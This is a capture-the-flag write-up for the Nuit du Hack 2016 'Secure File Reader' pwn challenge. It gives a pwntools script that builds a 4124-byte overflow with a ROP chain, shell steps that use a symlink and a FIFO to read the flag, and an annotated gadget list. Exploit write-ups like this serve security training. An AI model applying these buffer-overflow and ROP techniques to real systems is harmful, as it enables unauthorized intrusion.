Tags: rop 

Rating: 2.0

```python
# ____ _____ ____ _ _ ____ _____ _____ ___ _ _____
#/ ___|| ____/ ___| | | | _ \| ____| | ___|_ _| | | ____|
#\___ \| _|| | | | | | |_) | _| | |_ | || | | _|
# ___) | |__| |___| |_| | _ <| |___ | _| | || |___| |___
#|____/|_____\____|\___/|_| \_\_____| |_| |___|_____|_____|
#
# ____ _____ _ ____ _____ ____
#| _ \| ____| / \ | _ \| ____| _ \
#| |_) | _| / _ \ | | | | _| | |_) |
#| _ <| |___ / ___ \| |_| | |___| _ <
#|_| \_\_____/_/ \_\____/|_____|_| \_\
#

# _ _ _ _
# ___ ___ | |_ _| |_(_) ___ _ __ | |__ _ _
# / __|/ _ \| | | | | __| |/ _ \| '_ \ | '_ \| | | |
# \__ \ (_) | | |_| | |_| | (_) | | | | | |_) | |_| |
# |___/\___/|_|\__,_|\__|_|\___/|_| |_| |_.__/ \__, |
# |___/
# __ ___ _ ___ _
# / _|/ _ \__ _| |_ _ __ / _ \| |_
# | |_| | | \ \/ / __| '__| | | | __|
# | _| |_| |> <| |_| | | |_| | |_
# |_| \___//_/\_\\__|_| \___/ \__|
#

# ssh [email protected] -p 55552 # password is chall

from pwn import *
rop_chain = [0x8048e74, 0x80483ad, 0x80c296a, 0x080eff60, 0x804fac0, 0x80481d1, 0x080eff60, 0x804e820, 0x80481d1, 0xdeadbeef, 0xdeadbeef]
with open('attack','wb') as f:
f.write('X'*4124)
f.write(''.join(p32(a) for a in rop_chain))

# Run the attack using the following:
# cd $(mktemp -d)
# # somehow get the attack file (generated by running above code) into that directory; i used scp from my system
# ln -s /home/chall/flag arena.c
# mkfifo attackfifo
# cat attack > attackfifo | ~/pwn attackfifo

# Explanation:
#
# The fifo has 0 size, so will not cause problems, allowing buffer to overflow after 4124 bytes.
# Then we just make a rop chain
# The "arena.c" string is in the binary, so we use it
# safespot-content-location is just some large location in .bss found using `objdump -x pwn | grep bss`

# Rop chain:
#
# 0x8048e74 <save_in_buffer>
# 0x80483ad <pop-pop-ret>
# 0x80c296a <"arena.c"> # symlink arena.c to flag
# 0x080eff60 <safespot-content-location>
#
# 0x804fac0 <puts>
# 0x80481d1 <pop-ret>
# 0x080eff60 <safespot-content-location>
#
# 0x804e820 <exit>
# 0x80481d1 <pop-ret>
# 0xdeadbeef <exit-code>
#
# 0xdeadbeef <just-for-fun> # actually, this is important (though not essential), but i am not telling you why :P it revolves around the clobbering mechanism in this executable
```

Original writeup (https://github.com/TeamColonelPanic/write-ups/blob/master/2016/nuit-du-hack-qualifier-2016/exploitation/secure-file-reader/README.md).